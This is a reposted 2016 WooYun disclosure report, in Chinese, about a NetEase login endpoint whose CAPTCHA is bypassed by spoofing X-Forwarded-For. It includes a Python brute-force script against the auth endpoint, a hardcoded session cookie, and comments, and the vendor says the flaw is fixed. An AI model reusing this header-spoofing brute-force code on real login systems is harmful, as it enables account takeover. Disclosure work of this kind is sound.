定向爆破(报废)你的网易邮箱带exp和exp制作思路

admin 2017年4月4日23:29:37评论463 views字数 213阅读0分42秒阅读模式
摘要

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-31: 厂商已经确认,细节仅向厂商公开
2016-04-10: 细节向核心白帽子及相关领域专家公开
2016-04-20: 细节向普通白帽子公开
2016-04-30: 细节向实习白帽子公开
2016-05-15: 细节向公众公开

漏洞概要 关注数(45) 关注此漏洞

缺陷编号: WooYun-2016-189862

漏洞标题: 定向爆破(报废)你的网易邮箱带exp和exp制作思路

相关厂商: 网易

漏洞作者: 肖泽

提交时间: 2016-03-28 10:00

公开时间: 2016-05-15 13:20

漏洞类型: 网络设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 逻辑错误

6人收藏


漏洞详情

披露状态:

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-31: 厂商已经确认,细节仅向厂商公开
2016-04-10: 细节向核心白帽子及相关领域专家公开
2016-04-20: 细节向普通白帽子公开
2016-04-30: 细节向实习白帽子公开
2016-05-15: 细节向公众公开

简要描述:

之前小伙伴挖到一个接口,说是可以改一下POST头就可以无限制爆破邮箱,扔给我让我去做EXP爆破,然后就发现了一堆坑爹问题,甚至报废了我自己拿来测试的邮箱。。。。。我真是日了狗了。。。。。

详细说明:

首先,进入这个网址选择邮箱登陆code>http://bbs.c.163.com/signin/</code>,本来在这里输错3出会跳出验证码,但是经过测试发现,在POST头里面加入X-Forwarded-For就可以绕过这个验证码。

之后我就根据这个,制作了一个EXP,是Python,我想讲讲思路,首先我们要先复位之前漏洞的情况,才能根据这个制作EXP,我先写了一个脚本,用来测试研究,这是代码

code 区域
# -*- coding:utf-8 -*-
import requests
import random
def A(pwd,user):
ip=str(random.randint(1,100))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))
url = 'http://auth.c.163.com/rest/login/callback'
post = 'service=NCE&loginType=1&errorCallback=http%3A%2F%2Fbbs.c.163.com%2FsigninError&callback=http%3A%2F%2Fbbs.c.163.com%2FsigninCallback&autoLogin=true&userName='+user+'&password='+pwd
headers = {'POST':'/rest/login/callback HTTP/1.1',
'Host':'auth.c.163.com',
'User-Agent':' Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding':'gzip, deflate',
'DNT':'1',
"X-Forwarded-For":ip,
'Referer':'http://bbs.c.163.com/signin',
'Cookie':' __utma=5463265.1819682429.1458918249.1458918249.1458918249.1; __utmz=5463265.1458918249.1.1.utmcsr=bbs.c.163.com|utmccn=(referral)|utmcmd=referral|utmcct=/signin/; _ga=GA1.2.1620526553.1459001670; Province=020; City=0755; vjuids=8430fc37.153b34708b9.0.90c7314b44efc8; vjlast=1459001690.1459001690.30; _ntes_nnid=4cc3ad38d63fc0971fba002dc274581e,1459001690337; vinfo_n_f_l_n3=a707719c6786aa8c.1.1.1459001690365.1459001692002.1459007251991; _ntes_nuid=4cc3ad38d63fc0971fba002dc274581e; AUTHC=2f81e22c3cbe0a3e1ff73bd007fbef95d7aa42b0',
'Connection':'close',
'Content-Type':'application/x-www-form-urlencoded',
'Content-Length':'230'
}
r = requests.post(url,post,headers=headers,allow_redirects=False)
return r.headers
print A(user='',pwd='qq147855')

我相信大家都看到懂,一个简单的复现程序,我们先运行试试。

定向爆破(报废)你的网易邮箱带exp和exp制作思路

开始破解了

定向爆破(报废)你的网易邮箱带exp和exp制作思路

开始破解了

定向爆破(报废)你的网易邮箱带exp和exp制作思路

为了演示,我随便拿的一个字典,正确密码再最后,别吐槽我字典。

定向爆破(报废)你的网易邮箱带exp和exp制作思路

密码出来了,本来以为这个洞也就这样了,,,,因为我作死,经常测试,,,,结果我的账号。。。

定向爆破(报废)你的网易邮箱带exp和exp制作思路

即使输入正确的密码,走普通用户路线。。。也无法登陆,出现这个什么鬼邮箱认证失败。。。。。。

我试了重置账号密码等等一系列手段,只有最后重新注册覆盖才能使用,但是以前的数据全部被覆盖消失了。。。。。我只能说,这个EXP可能附带报废你的网易邮箱,拿自己邮箱测试的时候需谨慎。。。。。

修复方案:

咳咳,洗澡吧

版权声明:转载请注明来源 肖泽@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-03-31 13:10

厂商回复:

该问题已经修复,感谢您对网易产品的关注。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-28 10:32 | StrAge丶 ( 实习白帽子 | Rank:39 漏洞数:15 | my love crystal)

    1

    。。。。。我真是日了狗了。。。。。

  2. 2016-03-28 13:40 | 浅蓝 ( 普通白帽子 | Rank:303 漏洞数:113 | 乌云最帅 没有之一)

    1

    可怕

  3. 2016-03-28 14:30 | 肖泽 ( 实习白帽子 | Rank:53 漏洞数:15 | ....)

    1

    @浅蓝 BOSS~

  4. 2016-03-28 14:32 | 肖泽 ( 实习白帽子 | Rank:53 漏洞数:15 | ....)

    1

    @深蓝 老婆~

  5. 2016-03-28 20:00 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

    1

    我真是日了狗了,,

  6. 2016-03-28 20:20 | 肖泽 ( 实习白帽子 | Rank:53 漏洞数:15 | ....)

    1

    @欧尼酱 这是战术

  7. 2016-03-29 18:53 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

    1

    @肖泽 嗯,对

  8. 2016-03-31 13:51 | 小白G ( 实习白帽子 | Rank:61 漏洞数:21 | 黑夜给了我黑色的眼睛,而我却用它寻找光明...)

    1

    珍爱生命 远离黑客

  9. 2016-03-31 14:06 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    1

    。。。。日了狗了。。。

  10. 2016-03-31 14:44 | 方大核桃 ( 普通白帽子 | Rank:193 漏洞数:59 | 要怎么长大,才能赢过时间啊)

    1

    修复了可以公开么....

  11. 2016-03-31 15:50 | 肖泽 ( 实习白帽子 | Rank:53 漏洞数:15 | ....)

    1

    @方大核桃 里面是复制粘贴滴,算是我个人提前公开了

  12. 2016-05-15 16:55 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    0

    洞主漏点了

  13. 2016-05-15 20:45 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

    0

    姿势炸天

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin